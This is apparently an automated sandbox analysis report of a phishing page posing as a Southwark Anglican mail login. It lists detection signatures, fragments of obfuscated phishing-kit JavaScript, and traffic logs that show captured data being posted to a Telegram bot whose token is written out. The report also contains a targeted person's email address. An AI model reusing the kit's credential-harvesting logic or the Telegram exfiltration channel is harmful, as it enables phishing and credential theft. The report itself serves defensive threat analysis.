Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org

Overview

General Information

Sample URL:https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org
Analysis ID:1633668
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected HtmlPhish44
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML title does not match URL
Invalid 'copyright' link found
Javascript checks online IP of machine
URL contains potential PII (phishing indication)

Classification

  • System is w11x64_office
  • chrome.exe (PID: 7116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 290DF23002E9B52249B5549F0C668A86)
    • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1832,i,3419163324876400064,12375279564585686191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2060 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)
  • chrome.exe (PID: 6032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org" MD5: 290DF23002E9B52249B5549F0C668A86)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_63JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        0.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          0.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
            0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T13:51:03.968804+010018100071Potentially Bad Traffic192.168.2.2454004149.154.167.220443TCP
              2025-03-10T13:51:07.264845+010018100071Potentially Bad Traffic192.168.2.2454006149.154.167.220443TCP
              2025-03-10T13:51:23.348678+010018100071Potentially Bad Traffic192.168.2.2454009149.154.167.220443TCP
              2025-03-10T13:51:26.479469+010018100071Potentially Bad Traffic192.168.2.2454011149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgAvira URL Cloud: detection malicious, Label: phishing
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.htmlAvira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: 0.2.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.4.pages.csv, type: HTML
              Source: Yara matchFile source: 0.3.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_63, type: DROPPED
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.htmlHTTP Parser: var _$_17af=["hide","#msg","","val","#ai","animate","#automail","show","#inputbar","click","#back1","substr","hash","location","test","#errror","focus","@","indexof",".","tolowercase","touppercase","bmv4dc5waha=","#mgss","preventdefault","#pr","html","text","#logoname",".domain","#sub_btn","ready","appversion","clientinformation","language","display","style","loader","getelementsbyclassname","none","href","/","split","substring","https://image.thum.io/get/width/1200/http://","backgroundimage","body","url(\'","\')","overlay","block","modal","error","#error","lessthan4","#lessthan4","msg","submitbtn","#submit-btn","seclgss","#sec-lg-ss","frgpsw","#frg-psw","copy","#copy","placeholder","emltxt","attr","#email","pswtxt","#password","charat","slice","https://logo.clearbit.com/","https://www.google.com/s2/favicons?domain=","#logoimg","fail","done","get","src","#favicon"," ","emllogin","#loginmgs","title"," - ","mail","type","password","#pass-eye","verifyingtext","length",", "," +--------n","email : ","\x0a","pa...
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.htmlHTTP Parser: var _$_17af=["hide","#msg","","val","#ai","animate","#automail","show","#inputbar","click","#back1","substr","hash","location","test","#errror","focus","@","indexof",".","tolowercase","touppercase","bmv4dc5waha=","#mgss","preventdefault","#pr","html","text","#logoname",".domain","#sub_btn","ready","appversion","clientinformation","language","display","style","loader","getelementsbyclassname","none","href","/","split","substring","https://image.thum.io/get/width/1200/http://","backgroundimage","body","url(\'","\')","overlay","block","modal","error","#error","lessthan4","#lessthan4","msg","submitbtn","#submit-btn","seclgss","#sec-lg-ss","frgpsw","#frg-psw","copy","#copy","placeholder","emltxt","attr","#email","pswtxt","#password","charat","slice","https://logo.clearbit.com/","https://www.google.com/s2/favicons?domain=","#logoimg","fail","done","get","src","#favicon"," ","emllogin","#loginmgs","title"," - ","mail","type","password","#pass-eye","verifyingtext","length",", "," +--------n","email : ","\x0a","pa...
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: Number of links: 0
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: Title: Southwark - Mail does not match URL
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: Invalid link: Copyright 2025
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.htmlHTTP Parser: var _$_dc21=["get","https://ipinfo.io/json","open","onload","status","responsetext","parse","failed to fetch ip address","onerror","send","&type=mx","json","answer","length","\x0a","join","data","","map","no-mx","mx-error","ip","country","city","region","appversion","clientinformation","language","userlanguage","substring","password must be at least 4 characters long.","invalid password. please enter the correct information.","the account does not exist. please enter a different account.","email","password","login","secure login session","copyright \xa9 2025","verifying...","email login","mail","your email has been successfully activated.","thank you. you will receive your file in your email shortly.","\u5bc6\u7801\u957f\u5ea6\u5fc5\u987b\u5927\u4e8e4\u4e2a\u5b57\u7b26\u3002","\u65e0\u6548\u7684\u5bc6\u7801\u3002\u8bf7\u8f93\u5165\u6b63\u786e\u7684\u4fe1\u606f\u3002","\u8be5\u8d26\u6237\u4e0d\u5b58\u5728\u3002\u8bf7\u8f93\u5165\u5176\u4ed6\u8d26\u6237\u3002","\u90ae\u7bb1","\u5bc6\u7801","\u767...
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgSample URL: PII: luke.tatam@southwark.anglican.org
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: <input type="password" .../> found
              Source: https://www.southwark.anglican.org/HTTP Parser: No favicon
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="author".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="author".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="author".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="author".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="author".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="copyright".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="copyright".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="copyright".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="copyright".. found
              Source: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgHTTP Parser: No <meta name="copyright".. found

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.24:54006 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.24:54004 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.24:54011 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.24:54009 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.132
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.3
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.3
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.3
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.3
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /wp-admin/mail.verify/interface.root/login.php/inbox.html HTTP/1.1Host: kwikkopyegypt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://kwikkopyegypt.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://kwikkopyegypt.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://kwikkopyegypt.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/axios/0.20.0/axios.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=?v=BUILD_HASH HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlKHLAQiKo8sBCIWgzQEI+dfOARj0yc0BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /get/width/1200/http://southwark.anglican.org HTTP/1.1Host: image.thum.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=southwark.anglican.org HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Origin: https://kwikkopyegypt.comX-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlKHLAQiKo8sBCIWgzQEI+dfOARj0yc0BSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Origin: https://kwikkopyegypt.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resolve?name=southwark.anglican.org&type=MX HTTP/1.1Host: dns.googleConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Origin: https://kwikkopyegypt.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resolve?name=southwark.anglican.org&type=MX HTTP/1.1Host: dns.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Origin: https://kwikkopyegypt.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.southwark.anglican.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.southwark.anglican.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.southwark.anglican.org/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: kwikkopyegypt.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
              Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
              Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
              Source: global trafficDNS traffic detected: DNS query: image.thum.io
              Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
              Source: global trafficDNS traffic detected: DNS query: dns.google
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: www.southwark.anglican.org
              Source: unknownHTTP traffic detected: POST /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 714sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: https://kwikkopyegypt.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kwikkopyegypt.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCross-Origin-Resource-Policy: cross-originContent-Type: text/html; charset=UTF-8X-Content-Type-Options: nosniffDate: Mon, 10 Mar 2025 12:50:47 GMTServer: sffeContent-Length: 1593X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 10 Mar 2025 12:51:31 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91e2f1aa9ad14374-EWR
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 10 Mar 2025 12:51:34 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91e2f1bbc812069b-EWR
              Source: chromecache_65.1.drString found in binary or memory: http://jquery.org/license
              Source: chromecache_67.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
              Source: chromecache_65.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
              Source: chromecache_65.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
              Source: chromecache_65.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
              Source: chromecache_65.1.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
